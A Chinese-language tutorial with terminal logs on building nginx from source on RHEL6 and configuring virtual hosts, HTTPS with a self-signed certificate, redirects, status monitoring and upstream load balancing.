######nginx#####
###通过源码编译安装nginx###
使用configure,make,make install命令
1 从官网上下载 www.nginx.org 安装包,选稳定版的比较好
安装前要确保系统中有gcc,查看系统是否安装了gcc:
rpm -q gcc
2 tar zxf nginx-1.12.0.tar.gz
3 yum install -y pcre-devel
4 yum insall -y openssl-devel
5 useradd -M -d /usr/local/lnmp/nginx -s /sbin/nologin -u 800 nginx ###创建nginx用户###
6 cd nginx-1.12.0 ###congigure在此目录下
7 ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_modul
#####参数说明####
--prefix=/usr/local/lnmp/nginx ###定义一个能够保存服务文件的目录
--user=nginx ###设定用户,该用户要系统中存在,如果没有设定,默认是nobody###
--group=nginx ###设定组###
--with-threads ###支持线程###
--with-http_ssl_module ###允许加载一个模块,为http添加https支持###
--with-http_stub_status_modul ###允许加载一个模块,提供了nginx基础状态信息的访问接口,连接数量,处理的请求等
8 make && make install
9 cd /usr/local/lnmp/nginx/conf ###nginx默认的配置文件nginx.conf在该目录下###
10 cd /usr/local/lnmp/nginx/sbin/ ###nginx服务在该目录下###
11 ./nginx ###开启服务##
开启时碰到了无法开启的情况:端口被占用
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] still could not bind()
解决:
由于nginx的默认开启端口是80,查看以下端口的使用情况:
[root@server1 sbin]# netstat -antlupt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1121/varnishd
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 910/sshd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 986/master
tcp 0 0 127.0.0.1:6082 0.0.0.0:* LISTEN 1119/varnishd
tcp 0 0 172.25.78.1:22 172.25.78.250:36468 ESTABLISHED 1050/sshd
tcp 0 0 :::8080 :::* LISTEN 1249/httpd
tcp 0 0 :::80 :::* LISTEN 1121/varnishd
tcp 0 0 :::22 :::* LISTEN 910/sshd
tcp 0 0 ::1:25 :::* LISTEN 986/master
由此可见,varnish占用了80端口,只需将varnish服务关闭,或者修改varnish的端口
[root@server1 sbin]# /etc/init.d/varnish stop
Stopping Varnish Cache: [ OK ]
再次开启nginx服务
[root@server1 sbin]# ./nginx
[root@server1 sbin]# netstat -antlupt | grep nginx
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 6323/nginx
测试:
curl -I localhost
[root@server1 sbin]# curl localhost -I
HTTP/1.1 200 OK
Server: nginx/1.12.0 ###版本信息会显示出来,不合理###
Date: Wed, 19 Jul 2017 03:59:11 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Wed, 19 Jul 2017 03:57:23 GMT
Connection: keep-alive
ETag: "596ed8a3-264"
Accept-Ranges: bytes
[root@server1 nginx]# pwd
/usr/local/lnmp/nginx
[root@server1 nginx]# du -sh
5.9M .
###由于debug 模式编译存在,因此,会比较大,可以把debug模式编译去掉,编译以后程序只有几百 k###
####为了将版本信息隐藏,并且使编译后的程序只有几百 k,进行重新编译###
1 cd /usr/local/lnmp/nginx/sbin/
./nginx -s stop ###将nginx服务关闭###
2 netstat -antlp ###查看,确认服务关闭##
3 rm -fr /usr/local/lnmp/nginx/ ###删除服务的文件目录###
4 cd nginx-1.12.0
make clean ###重新编译时,需要清除旧的对象文件和缓存信息###
5 rm -fr nginx-1.12.0 ###删除解压目录###
6 tar zxf nginx-1.12.0.tar.gz ###重新解压###
7 cd /root/nginx-1.12.0/src/core
vim nginx.h
内容:
#define nginx_version 1012000
#define NGINX_VERSION "1.12.0"
#define NGINX_VER "nginx/" ###将版本信息删除###
8 cd /root/nginx-1.12.0/auto/cc
vim gcc
内容:
171 # debug
172 #CFLAGS="$CFLAGS -g" 把debug模式编译去掉
9 ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_modul
10 make && make install
11 ln -s /usr/local/lnmp/nginx/sbin/nginx /sbin/ ###软连接,更方便访问###
测试:
[root@server1 nginx]# du -sh
988K
[root@server1 nginx]# curl -I localhost
HTTP/1.1 200 OK
Server: nginx/
Date: Thu, 20 Jul 2017 03:19:28 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Thu, 20 Jul 2017 03:16:18 GMT
Connection: keep-alive
ETag: "59702082-264"
Accept-Ranges: bytes
具体过程如下:
[root@server1 ~]# tar zxf nginx-1.12.0.tar.gz
[root@server1 ~]# ls
anaconda-ks.cfg install.log.syslog varnish-3.0.5-1.el6.x86_64.rpm
bansys.zip nginx-1.12.0 varnish-libs-3.0.5-1.el6.x86_64.rpm
install.log nginx-1.12.0.tar.gz
[root@server1 ~]# cd nginx-1.12.0
[root@server1 nginx-1.12.0]# ls
auto CHANGES CHANGES.ru conf configure contrib html LICENSE man README src
[root@server1 nginx-1.12.0]# ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module
(省略.....)
出现的问题:
********************************************************************************
checking for PCRE library ... not found
checking for PCRE library in /usr/local/ ... not found
checking for PCRE library in /usr/include/pcre/ ... not found
checking for PCRE library in /usr/pkg/ ... not found
checking for PCRE library in /opt/local/ ... not found
./configure: error: the HTTP rewrite module requires the PCRE library.
You can either disable the module by using --without-http_rewrite_module
option, or install the PCRE library into the system, or build the PCRE library
statically from the source with nginx by using --with-pcre=<path> option.
***********************************************************************************
####由此可见缺少PCRE library,因此要安装pcre-devel#####
[root@server1 nginx-1.12.0]# rpm -q gcc
gcc-4.4.7-4.el6.x86_64
[root@server1 nginx-1.12.0]# yum install -y pcre-devel
[root@server1 nginx-1.12.0]# rpm -q gcc
gcc-4.4.7-4.el6.x86_64
[root@server1 nginx-1.12.0]# ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module
(省略安装过程.....)
出现的问题:
**************************************************************************
checking for PCRE JIT support ... not found
checking for OpenSSL library ... not found
checking for OpenSSL library in /usr/local/ ... not found
checking for OpenSSL library in /usr/pkg/ ... not found
checking for OpenSSL library in /opt/local/ ... not found
./configure: error: SSL modules require the OpenSSL library.
You can either do not enable the modules, or install the OpenSSL library
into the system, or build the OpenSSL library statically from the source
with nginx by using --with-openssl=<path> option.
**************************************************************************
###由提示可以看出缺少OpenSSL library,因此要安装openssl-devel####
[root@server1 nginx-1.12.0]# yum install -y openssl-devel
[root@server1 ~]# useradd -M -d /usr/local/lnmp/nginx -s /sbin/nologin -u 800 nginx
[root@server1 nginx-1.12.0]# ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module
(省略安装过程.....)
####没有报错,说明配置成功,一般在安装过程中如果缺少什么,就安装对应的 xxxx-devel,因为devel是c开发包,包含c的头文件和库####
[root@server1 nginx-1.12.0]# make && make install
[root@server1 nginx-1.12.0]# cd /usr/local/lnmp/
[root@server1 lnmp]# ls
nginx
[root@server1 lnmp]# cd nginx/
[root@server1 nginx]# ls
conf html logs sbin
[root@server1 nginx]# du -sh
5.9M .
[root@server1 nginx]# ls
conf html logs sbin
[root@server1 nginx]# cd sbin/
[root@server1 sbin]# ls
nginx
[root@server1 sbin]# ./nginx
[root@server1 sbin]# netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 6060/nginx
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 900/sshd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 976/master
tcp 0 0 172.25.38.1:22 172.25.38.250:39568 ESTABLISHED 1040/sshd
tcp 0 0 172.25.38.1:22 172.25.38.250:39572 ESTABLISHED 1067/sshd
tcp 0 0 :::22 :::* LISTEN 900/sshd
tcp 0 0 ::1:25 :::* LISTEN 976/master
[root@server1 sbin]# curl localhost -I
HTTP/1.1 200 OK
Server: nginx/1.12.0 ###版本信息会显示出来,不合理###
Date: Wed, 19 Jul 2017 03:59:11 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Wed, 19 Jul 2017 03:57:23 GMT
Connection: keep-alive
ETag: "596ed8a3-264"
Accept-Ranges: bytes
[root@server1 sbin]# ./nginx -s stop
[root@server1 sbin]# netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 900/sshd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 976/master
tcp 0 0 172.25.38.1:22 172.25.38.250:39568 ESTABLISHED 1040/sshd
tcp 0 0 127.0.0.1:59479 127.0.0.1:80 TIME_WAIT -
tcp 0 0 127.0.0.1:59481 127.0.0.1:80 TIME_WAIT -
tcp 0 0 172.25.38.1:22 172.25.38.250:39572 ESTABLISHED 1067/sshd
tcp 0 0 :::22 :::* LISTEN 900/sshd
tcp 0 0 ::1:25 :::* LISTEN 976/master
[root@server1 sbin]# cd /usr/local/
[root@server1 local]# cd lnmp/
[root@server1 lnmp]# rm -fr nginx/
[root@server1 ~]# cd nginx-1.12.0
[root@server1 nginx-1.12.0]# make clean
rm -rf Makefile objs
[root@server1 nginx-1.12.0]# cd ..
[root@server1 ~]# rm -fr nginx-1.12.0
[root@server1 ~]# ls
anaconda-ks.cfg nginx-1.12.0.tar.gz
bansys.zip varnish-3.0.5-1.el6.x86_64.rpm
install.log varnish-libs-3.0.5-1.el6.x86_64.rpm
install.log.syslog
[root@server1 ~]# tar zxf nginx-1.12.0.tar.gz
[root@server1 ~]# ls
anaconda-ks.cfg nginx-1.12.0
bansys.zip nginx-1.12.0.tar.gz
install.log varnish-3.0.5-1.el6.x86_64.rpm
install.log.syslog varnish-libs-3.0.5-1.el6.x86_64.rpm
[root@server1 ~]# cd nginx-1.12.0
[root@server1 nginx-1.12.0]# ls
auto CHANGES.ru configure html man src
CHANGES conf contrib LICENSE README
[root@server1 nginx-1.12.0]# cd src/
[root@server1 src]# ls
core event http mail misc os stream
[root@server1 src]# cd core/
[root@server1 core]# vim nginx.h
[root@server1 core]# cd ..
[root@server1 src]# cd ..
[root@server1 nginx-1.12.0]# cd auto/
[root@server1 auto]# ls
cc have init module os threads
define have_headers install modules sources types
endianness headers lib nohave stubs unix
feature include make options summary
[root@server1 auto]# cd cc/
[root@server1 cc]# ls
acc bcc ccc clang conf gcc icc msvc name owc sunc
[root@server1 cc]# vim gcc
[root@server1 cc]# cd ..
[root@server1 auto]# cd ..
[root@server1 nginx-1.12.0]# ls
auto CHANGES.ru configure html man src
CHANGES conf contrib LICENSE README
[root@server1 nginx-1.12.0]# ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module
[root@server1 nginx-1.12.0]# make && make install
[root@server1 nginx-1.12.0]# cd /usr/local/lnmp/nginx/
[root@server1 nginx]# ls
conf html logs sbin
[root@server1 nginx]# du -sh
960K .
[root@server1 nginx]# cd sbin/
[root@server1 sbin]# ls
nginx
[root@server1 sbin]# ./nginx
[root@server1 sbin]# pwd
/usr/local/lnmp/nginx/sbin
[root@server1 sbin]# ln -s /usr/local/lnmp/nginx/sbin/nginx /sbin/
[root@server1 sbin]# which nginx
/sbin/nginx
[root@server1 sbin]# curl -I localhost
HTTP/1.1 200 OK
Server: nginx/
Date: Wed, 19 Jul 2017 04:07:59 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Wed, 19 Jul 2017 04:05:33 GMT
Connection: keep-alive
ETag: "596eda8d-264"
Accept-Ranges: bytes
###使用yum安装时应该要看安装时的脚本,防止一些流氓软件###
以httpd为例:
[root@server1 lnmp]# rpm -q --scripts httpd
preinstall scriptlet (using /bin/sh): ###安装前执行的脚本##
# Add the "apache" user
getent group apache >/dev/null || groupadd -g 48 -r apache
getent passwd apache >/dev/null || \
useradd -r -u 48 -g apache -s /sbin/nologin \
-d /var/www -c "Apache" apache
exit 0
postinstall scriptlet (using /bin/sh): ###安装后执行的脚本##
# Register the httpd service
/sbin/chkconfig --add httpd
/sbin/chkconfig --add htcacheclean
preuninstall scriptlet (using /bin/sh):
if [ $1 = 0 ]; then
/sbin/service httpd stop > /dev/null 2>&1
/sbin/chkconfig --del httpd
/sbin/service htcacheclean stop > /dev/null 2>&1
/sbin/chkconfig --del htcacheclean
fi
posttrans scriptlet (using /bin/sh):
test -f /etc/sysconfig/httpd-disable-posttrans || \
/sbin/service httpd condrestart >/dev/null 2>&1 || :
[root@server1 lnmp]# rpm -qi httpd ###查看httpd的信息##
Name : httpd Relocations: (not relocatable)
Version : 2.2.15 Vendor: Red Hat, Inc.
Release : 29.el6_4 Build Date: Fri 02 Aug 2013 08:03:06 PM CST
Install Date: Wed 19 Jul 2017 09:34:59 AM CST Build Host: x86-002.build.bos.redhat.com
Group : System Environment/Daemons Source RPM: httpd-2.2.15-29.el6_4.src.rpm
Size : 3075393 License: ASL 2.0
Signature : RSA/8, Mon 12 Aug 2013 09:49:45 PM CST, Key ID 199e2f91fd431d51
Packager : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
URL : http://httpd.apache.org/
Summary : Apache HTTP Server
Description :
The Apache HTTP Server is a powerful, efficient, and extensible
web server.
####nginx绑定cpu###
1 vim /usr/local/lnmp/nginx/conf/nginx.conf
内容:
worker_processes 2; ###表示开启两个nginx进程###
worker_cpu_affinity 01 10; ###第一个进程对应第一个cpu内核,第二个进程对应第二个cpu内核###
events {
worker_connections 65535; ###允许连接进程的最大数,不能大于fs.file-max的数###
}
2 nginx -t ###查看配置文件是否有语法错误###
3 nginx -s reload ###重新加载nginx###
4 vim /etc/security/limits.conf ###在该文件下编写才会生效###
nginx - nofile 65535
测试:
切换到nginx用户,执行ulimit -a
(在切换前,要将nginx用户改成可以登入usermod -s /bin/bash nginx)
[root@server1 ~]# su - nginx
-bash-4.1$ ulimit -a
core file size (blocks, -c) 0
data seg size (kbytes, -d) unlimited
scheduling priority (-e) 0
file size (blocks, -f) unlimited
pending signals (-i) 14868
max locked memory (kbytes, -l) 64
max memory size (kbytes, -m) unlimited
open files (-n) 65535 ###发现已经改变成了65535###
pipe size (512 bytes, -p) 8
POSIX message queues (bytes, -q) 819200
real-time priority (-r) 0
stack size (kbytes, -s) 10240
cpu time (seconds, -t) unlimited
max user processes (-u) 1024
virtual memory (kbytes, -v) unlimited
file locks (-x) unlimited
-bash-4.1$
##nginx -s reload##有多少核就有几位数,2核是01,四核是0001,8核是00000001,以此类推###
[root@server1 conf]# sysctl -a | grep file ###sysctl -a指显示所有的系统参数###
fs.file-nr = 512 0 188464
fs.file-max = 188464
####nginx建立虚拟主机###
默认发布目录:
/usr/local/lnmp/nginx/html
1 vim /usr/local/lnmp/nginx/conf/nginx.conf
内容:注意该内容要写在http下
server {
listen 80; ###访问80端口###
server_name www.westos.org; ###服务器名称###
location / {
root /web1; ###发布目录###
index index.html; ###网页###
}
}
2 mkdir /web1
3 vim /web1/index.html
内容:
<h1>www.westos.org</h1>
4 nginx -s reload
测试:
具体过程如下:
[root@server1 lnmp]# cd /usr/local/lnmp/nginx/conf/
[root@server1 conf]# ls
fastcgi.conf koi-win scgi_params
fastcgi.conf.default mime.types scgi_params.default
fastcgi_params mime.types.default uwsgi_params
fastcgi_params.default nginx.conf uwsgi_params.default
koi-utf nginx.conf.default win-utf
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 8673/nginx
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 900/sshd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 976/master
tcp 0 0 172.25.38.1:22 172.25.38.250:39568 ESTABLISHED 1040/sshd
tcp 0 0 172.25.38.1:22 172.25.38.250:39572 ESTABLISHED 1067/sshd
tcp 0 0 :::22 :::* LISTEN 900/sshd
tcp 0 0 ::1:25 :::* LISTEN 976/master
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# sysctl -a | grep file
fs.file-nr = 544 0 188464
fs.file-max = 188464
[root@server1 conf]# ulimit -a
core file size (blocks, -c) 0
data seg size (kbytes, -d) unlimited
scheduling priority (-e) 0
file size (blocks, -f) unlimited
pending signals (-i) 14868
max locked memory (kbytes, -l) 64
max memory size (kbytes, -m) unlimited
open files (-n) 1024
pipe size (512 bytes, -p) 8
POSIX message queues (bytes, -q) 819200
real-time priority (-r) 0
stack size (kbytes, -s) 10240
cpu time (seconds, -t) unlimited
max user processes (-u) 14868
virtual memory (kbytes, -v) unlimited
file locks (-x) unlimited
[root@server1 conf]# id
uid=0(root) gid=0(root) groups=0(root)
[root@server1 conf]# vim /etc/security/limits.conf
[root@server1 conf]# usermod -s /bin/bash nginx
[root@server1 conf]# su - nginx
-bash-4.1$ ulimit -a
core file size (blocks, -c) 0
data seg size (kbytes, -d) unlimited
scheduling priority (-e) 0
file size (blocks, -f) unlimited
pending signals (-i) 14868
max locked memory (kbytes, -l) 64
max memory size (kbytes, -m) unlimited
open files (-n) 1024
pipe size (512 bytes, -p) 8
POSIX message queues (bytes, -q) 819200
real-time priority (-r) 0
stack size (kbytes, -s) 10240
cpu time (seconds, -t) unlimited
max user processes (-u) 1024
virtual memory (kbytes, -v) unlimited
file locks (-x) unlimited
-bash-4.1$ exit
logout
[root@server1 conf]# usermod -s /sbin/nologin nginx
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t ###查看是否有语法错误##
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload ###重新加载###
[root@server1 conf]# mkdir /web1
[root@server1 conf]# cd /web1/
[root@server1 web1]# ls
[root@server1 web1]# vim index.html
[root@server1 web1]# nginx -s reload
[root@server1 web1]# cd /usr/local/lnmp/
[root@server1 lnmp]# ls
nginx
[root@server1 lnmp]# cd nginx/
[root@server1 nginx]# ls
client_body_temp fastcgi_temp logs sbin uwsgi_temp
conf html proxy_temp scgi_temp
[root@server1 nginx]# cd html/
[root@server1 html]# ls
50x.html index.html
####https####
端口为443,配置前要确认安装了openssl和openssl-devel,由于之前源码编译时已经安装过,所以在这里就不用再次安装。
信任主机的问题. 采用https 的server 必须从CA 申请一个用于证明服务器用途类型的证书
希望服务器与客户端之间传输内容是加密的,防止中间监听泻露信息,就可以用https进行访问的加密。如果用于内部人员的访问,可以自己颁发证书。
1 cd /etc/pki/tls/certs/
2 make cert.pem ###产生证书和密钥,用该命令会将证书和key放在一个文件里,这样在nginx的配置文件里就不用写两个文件###
【过程:
umask 77 ; \
PEM1=`/bin/mktemp /tmp/openssl.XXXXXX` ; \
PEM2=`/bin/mktemp /tmp/openssl.XXXXXX` ; \
/usr/bin/openssl req -utf8 -newkey rsa:2048 -keyout $PEM1 -nodes -x509 -days 365 -out $PEM2 -set_serial 0 ; \
cat $PEM1 > cert.pem ; \
echo "" >> cert.pem ; \
cat $PEM2 >> cert.pem ; \
rm -f $PEM1 $PEM2
Generating a 2048 bit RSA private key
........................................................+++
..............................+++
writing new private key to '/tmp/openssl.UVFnm7'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [XX]:cn
State or Province Name (full name) []:shaanxi
Locality Name (eg, city) [Default City]:xi'an
Organization Name (eg, company) [Default Company Ltd]:westos
Organizational Unit Name (eg, section) []:linux
Common Name (eg, your name or your server's hostname) []:server1
Email Address []:root@westos.org
】
3 mv /etc/pki/tls/certs/cert.pem /usr/local/lnmp/nginx/conf/ ###在nginx中的配置文件里,给的是相对地址,因此要将其移到配置文件的目录下###
4 vim /usr/local/lnmp/nginx/conf/nginx.conf
内容:
server {
listen 443 ssl;
server_name www.westos.org;
ssl_certificate cert.pem;
ssl_certificate_key cert.pem;
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 5m;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;
location / {
root /web1;
index index.html index.htm;
}
8 nginx -s reload
测试:
登入https://172.25.38.1
具体过程如下:
[root@server1 conf]# cd /etc/pki/tls/certs/
[root@server1 certs]# ls
ca-bundle.crt ca-bundle.trust.crt make-dummy-cert Makefile renew-dummy-cert
[root@server1 certs]# make cert.pem
umask 77 ; \
PEM1=`/bin/mktemp /tmp/openssl.XXXXXX` ; \
PEM2=`/bin/mktemp /tmp/openssl.XXXXXX` ; \
/usr/bin/openssl req -utf8 -newkey rsa:2048 -keyout $PEM1 -nodes -x509 -days 365 -out $PEM2 -set_serial 0 ; \
cat $PEM1 > cert.pem ; \
echo "" >> cert.pem ; \
cat $PEM2 >> cert.pem ; \
rm -f $PEM1 $PEM2
Generating a 2048 bit RSA private key
........................................................+++
..............................+++
writing new private key to '/tmp/openssl.UVFnm7'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [XX]:cn
State or Province Name (full name) []:shaanxi
Locality Name (eg, city) [Default City]:xi'an
Organization Name (eg, company) [Default Company Ltd]:westos
Organizational Unit Name (eg, section) []:linux
Common Name (eg, your name or your server's hostname) []:server1
Email Address []:root@westos.org
[root@server1 certs]# ll
total 1716
-rw-r--r--. 1 root root 753868 Sep 4 2013 ca-bundle.crt
-rw-r--r--. 1 root root 974993 Sep 4 2013 ca-bundle.trust.crt
-rw------- 1 root root 3088 Jul 19 15:31 cert.pem
-rw------- 1 root root 1383 Jul 19 15:29 localhost.crt
-rwxr-xr-x. 1 root root 610 Sep 27 2013 make-dummy-cert
-rw-r--r--. 1 root root 2242 Sep 27 2013 Makefile
-rwxr-xr-x. 1 root root 829 Sep 27 2013 renew-dummy-cert
[root@server1 certs]# ll cert.pem
-rw------- 1 root root 3088 Jul 19 15:31 cert.pem
[root@server1 certs]# mv cert.pem /usr/local/lnmp/nginx/conf/ ###在nginx中的配置文件里,给的是相对地址,因此要将其移到配置文件的目录下###
[root@server1 certs]# cd /usr/local/lnmp/nginx/conf/
[root@server1 conf]# ls
cert.pem koi-win scgi_params.default
fastcgi.conf mime.types uwsgi_params
fastcgi.conf.default mime.types.default uwsgi_params.default
fastcgi_params nginx.conf win-utf
fastcgi_params.default nginx.conf.default
koi-utf scgi_params
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 8673/nginx
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 900/sshd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 976/master
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 8673/nginx
tcp 0 0 172.25.38.1:22 172.25.38.250:39568 ESTABLISHED 1040/sshd
tcp 0 0 172.25.38.1:22 172.25.38.250:39572 ESTABLISHED 1067/sshd
tcp 0 0 :::22 :::* LISTEN 900/sshd
tcp 0 0 ::1:25 :::* LISTEN 976/master
###网页重写###
当访问www.westos.org时重写成https://www.westos.org
1 vim /usr/local/lnmp/nginx/conf/nginx.conf
内容:
server {
listen 443 ssl;
server_name www.westos.org;
ssl_certificate cert.pem;
ssl_certificate_key cert.pem;
ssl_session_cache shared:SSL:1m;
ssl_session_timeout 5m;
ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;
location / {
root /web1;
index index.html index.htm;
}
}
server {
listen 80;
server_name www.westos.org;
rewrite ^(.*)$ https://www.westos.org$1 permanent; ###把你输入的url重定向成https://www.westos.org,permanent表示永久重定向,redirect表示临时重定向,$1表示可以指定访问www.westos.org的目录###
}
2 nginx -s reload
3 vim /web1/admin/index.html
内容:
admin page
测试:
访问www.westos.org和www.westos.org/admin
###监控连接数###
在源码编译nginx的时候编译了--with-http_stub_status_modul该模块,nginx的监控就是该模块的应用
1 vim /usr/local/lnmp/nginx/conf/nginx.conf
内容:
server {
listen 80;
server_name localhost;
location /status { ###/status是一个监控的模块,在源码安装时导入的模块####
stub_status on;
access_log off;
allow 172.25.38.2; ###允许172.25.38.2主机连接##
deny all; ###拒绝除了172.25.38.2之外的其他主机连接,allow和deny有访问的优先顺序###
}
}
2 nginx -s reload
测试:
访问http://172.25.38.1/status
Active connections: 1
server accepts handled requests
9 9 10
Reading: 0 Writing: 1 Waiting: 0
####负载均衡###
1 vim /usr/local/lnmp/nginx/conf/nginx.conf
内容:
http {
upstream westos{ ###westos就是一个别名###
server 172.25.38.2:80 ; ###访问后端服务器的80端口###
server 172.25.38.3:8080; ###访问后端服务器的8080端口##
server 127.0.0.1:8000 backup; ###当后端服务器全挂了之后,就会访问本地的index.html文件(提示系统正在维护中。。。)###
}
server {
listen 80;
server_name www.westos.org;
location / {
proxy_pass http://westos; ###默认是轮询
}
}
2 vim /var/www/html/index.html
内容:
系统正在维护中。。。
3
####负载均衡指定权重weight###
upstream westos{
server 172.25.38.2:80 weight=2; ###指定访问两次172.25.38.2,再访问172.25.38.3一次###
server 172.25.38.3:8080;
#server 127.0.0.1:8000 backup;
}
###ip_hash###
只要来源为同一个ip的都会被指定到同一个后端服务器,不用加权重,不支持backup###
upstream westos{
ip_hash;
server 172.25.38.2:80
server 172.25.38.3:8080;
}
具体过程如下:
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# cd /web1/
[root@server1 web1]# ls
index.html
[root@server1 web1]# mkdir admin
[root@server1 web1]# ls
admin index.html
[root@server1 web1]# cd admin/
[root@server1 admin]# ls
[root@server1 admin]# vim index.html
[root@server1 admin]# vim index.html
[root@server1 admin]# cd /usr/local/
[root@server1 local]# ls
bin etc games include lib lib64 libexec lnmp sbin share src
[root@server1 local]# cd lnmp/nginx/conf/
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# vim /etc/httpd/conf/httpd.conf
[root@server1 conf]# /etc/init.d/httpd restart
Stopping httpd: [FAILED]
Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using 172.25.38.1 for ServerName
[ OK ]
[root@server1 conf]# /etc/init.d/httpd start
Starting httpd:
[root@server1 conf]# /etc/init.d/httpd restart
Stopping httpd: [ OK ]
Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using 172.25.38.1 for ServerName
[ OK ]
[root@server1 conf]# nginx -s reload
[root@server1 conf]# cd /var/www/html/
[root@server1 html]# ls
class_socket.php config.php index.php purge_action.php static
[root@server1 html]# rm -fr *
[root@server1 html]# vim /index.html
[root@server1 html]# /etc/init.d/httpd restart
Stopping httpd: [ OK ]
Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using 172.25.38.1 for ServerName
[ OK ]
[root@server1 html]# ls
[root@server1 html]# mv /index.html ./
[root@server1 html]# ls
index.html
[root@server1 html]# cd /usr/local/
bin/ games/ lib/ libexec/ sbin/ src/
etc/ include/ lib64/ lnmp/ share/
[root@server1 html]# cd /usr/local/lnmp/nginx/conf/
[root@server1 conf]# ls
cert.pem koi-win scgi_params.default
fastcgi.conf mime.types uwsgi_params
fastcgi.conf.default mime.types.default uwsgi_params.default
fastcgi_params nginx.conf win-utf
fastcgi_params.default nginx.conf.default
koi-utf scgi_params
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
[root@server1 conf]# vim nginx.conf
###通过源码编译安装nginx###
使用configure,make,make install命令
1 从官网上下载 www.nginx.org 安装包,选稳定版的比较好
安装前要确保系统中有gcc,查看系统是否安装了gcc:
